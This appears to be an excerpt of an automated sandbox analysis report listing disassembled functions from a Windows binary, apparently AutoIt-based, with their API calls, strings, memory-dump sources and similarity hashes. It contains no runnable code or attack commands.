                                                                                                Function 0044F0B3 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove$_memcmp
                                                                                                • String ID: '$\$h
                                                                                                • API String ID: 2205784470-1303700344
                                                                                                • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                                • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                                                                • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                                • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                                                                Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                                                • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                                                • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                                                • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                                                • __swprintf.LIBCMT ref: 0045EC33
                                                                                                • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                                                Strings
                                                                                                • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                                                                • String ID: %4d%02d%02d%02d%02d%02d
                                                                                                • API String ID: 2441338619-1568723262
                                                                                                • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                                                                • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                                                                • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                                                                • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                                                                Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                                                • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                • String ID: @COM_EVENTOBJ
                                                                                                • API String ID: 327565842-2228938565
                                                                                                • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                                                                • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                                                                • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                                                                • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                                                                Function 0047025C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • VariantClear.OLEAUT32(?), ref: 0047031B
                                                                                                • VariantClear.OLEAUT32(?), ref: 0047044F
                                                                                                • VariantInit.OLEAUT32(?), ref: 004704A3
                                                                                                • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                                                                • VariantClear.OLEAUT32(?), ref: 00470516
                                                                                                  • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                                                                  • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                                                                • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                                                • String ID: H
                                                                                                • API String ID: 3613100350-2852464175
                                                                                                • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                                                                • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                                                • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                                                                • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                                                                Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                                                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                                • String ID:
                                                                                                • API String ID: 1291720006-3916222277
                                                                                                • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                                • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                                                                • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                                • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                                                Function 0045FBAC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                                                • IsMenu.USER32(?), ref: 0045FC5F
                                                                                                • CreatePopupMenu.USER32 ref: 0045FC97
                                                                                                • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                • String ID: 0$2
                                                                                                • API String ID: 93392585-3793063076
                                                                                                • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                                                • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                                                Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                                                • VariantClear.OLEAUT32(?), ref: 00435320
                                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                                                • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                                                • String ID: crts
                                                                                                • API String ID: 586820018-3724388283
                                                                                                • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                                                                • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                                                                Function 0044BBD2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                                                • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                                                • _wcscat.LIBCMT ref: 0044BCAF
                                                                                                • _wcslen.LIBCMT ref: 0044BCBB
                                                                                                • _wcslen.LIBCMT ref: 0044BCD1
                                                                                                • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                                                • String ID: \*.*
                                                                                                • API String ID: 2326526234-1173974218
                                                                                                • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                                                                • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                                                Function 004335CD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                                                • _wcslen.LIBCMT ref: 004335F2
                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                                                • GetLastError.KERNEL32 ref: 0043362B
                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                                                • _wcsrchr.LIBCMT ref: 00433666
                                                                                                  • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                                • String ID: \
                                                                                                • API String ID: 321622961-2967466578
                                                                                                • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                                                • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                                                • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                                                • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                                                Function 0044C7DD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __wcsnicmp
                                                                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                • API String ID: 1038674560-2734436370
                                                                                                • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                                                • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                                                                • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                                                • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                                                                Function 00434034 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                                                                                                • LoadStringW.USER32(00000000), ref: 00434060
                                                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                                                • LoadStringW.USER32(00000000), ref: 00434078
                                                                                                • _wprintf.LIBCMT ref: 004340A1
                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                                                Strings
                                                                                                • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                                                • API String ID: 3648134473-3128320259
                                                                                                • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                                • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                                                • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                                • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                                                Function 0041793C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                                                • __lock.LIBCMT ref: 00417981
                                                                                                  • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                                                  • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                                                  • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                                                • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                                                • __lock.LIBCMT ref: 004179A2
                                                                                                • ___addlocaleref.LIBCMT ref: 004179C0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                • String ID: KERNEL32.DLL$pI
                                                                                                • API String ID: 637971194-197072765
                                                                                                • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                                                • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                                                Function 0046822A Relevance: 12.3, APIs: 8, Instructions: 267COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
